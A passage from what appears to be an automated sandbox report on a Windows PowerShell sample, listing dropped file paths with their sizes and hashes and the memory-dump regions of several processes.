        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        966914e2e771de7a4a57a95b6ecfa8a9

        SHA1

        7a32282fd51dd032967ed4d9a40cc57e265aeff2

        SHA256

        98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

        SHA512

        dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        88be3bc8a7f90e3953298c0fdbec4d72

        SHA1

        f4969784ad421cc80ef45608727aacd0f6bf2e4b

        SHA256

        533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

        SHA512

        4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3tspjlr1.hwv.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/876-36-0x000001ED58890000-0x000001ED58906000-memory.dmp

        Filesize

        472KB

      • memory/876-37-0x000001ED3FDB0000-0x000001ED3FE00000-memory.dmp

        Filesize

        320KB

      • memory/876-76-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/876-2-0x000001ED58780000-0x000001ED58790000-memory.dmp

        Filesize

        64KB

      • memory/876-85-0x000001ED58750000-0x000001ED58762000-memory.dmp

        Filesize

        72KB

      • memory/876-0-0x000001ED3E0F0000-0x000001ED3E130000-memory.dmp

        Filesize

        256KB

      • memory/876-107-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/876-1-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/876-84-0x000001ED3FE00000-0x000001ED3FE0A000-memory.dmp

        Filesize

        40KB

      • memory/876-88-0x000001ED58780000-0x000001ED58790000-memory.dmp

        Filesize

        64KB

      • memory/876-38-0x000001ED3FD80000-0x000001ED3FD9E000-memory.dmp

        Filesize

        120KB

      • memory/1664-102-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/1664-90-0x000001B3509B0000-0x000001B3509C0000-memory.dmp

        Filesize

        64KB

      • memory/1664-89-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/2576-11-0x000002A8A06C0000-0x000002A8A06D0000-memory.dmp

        Filesize

        64KB

      • memory/2576-12-0x000002A8A06C0000-0x000002A8A06D0000-memory.dmp

        Filesize

        64KB

      • memory/2576-9-0x000002A8A0680000-0x000002A8A06A2000-memory.dmp

        Filesize

        136KB

      • memory/2576-10-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/2576-18-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/2932-21-0x000001ED12C00000-0x000001ED12C10000-memory.dmp

        Filesize

        64KB

      • memory/2932-108-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/2932-22-0x000001ED12C00000-0x000001ED12C10000-memory.dmp

        Filesize

        64KB

      • memory/2932-20-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/3908-78-0x0000013FF06B0000-0x0000013FF06C0000-memory.dmp

        Filesize

        64KB

      • memory/3908-82-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/3908-79-0x0000013FF06B0000-0x0000013FF06C0000-memory.dmp

        Filesize

        64KB

      • memory/3908-77-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/4728-66-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      • memory/4728-64-0x00000202DC920000-0x00000202DC930000-memory.dmp

        Filesize

        64KB

      • memory/4728-41-0x00000202DC920000-0x00000202DC930000-memory.dmp

        Filesize

        64KB

      • memory/4728-40-0x00000202DC920000-0x00000202DC930000-memory.dmp

        Filesize

        64KB

      • memory/4728-39-0x00007FFE359F0000-0x00007FFE364B1000-memory.dmp

        Filesize

        10.8MB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.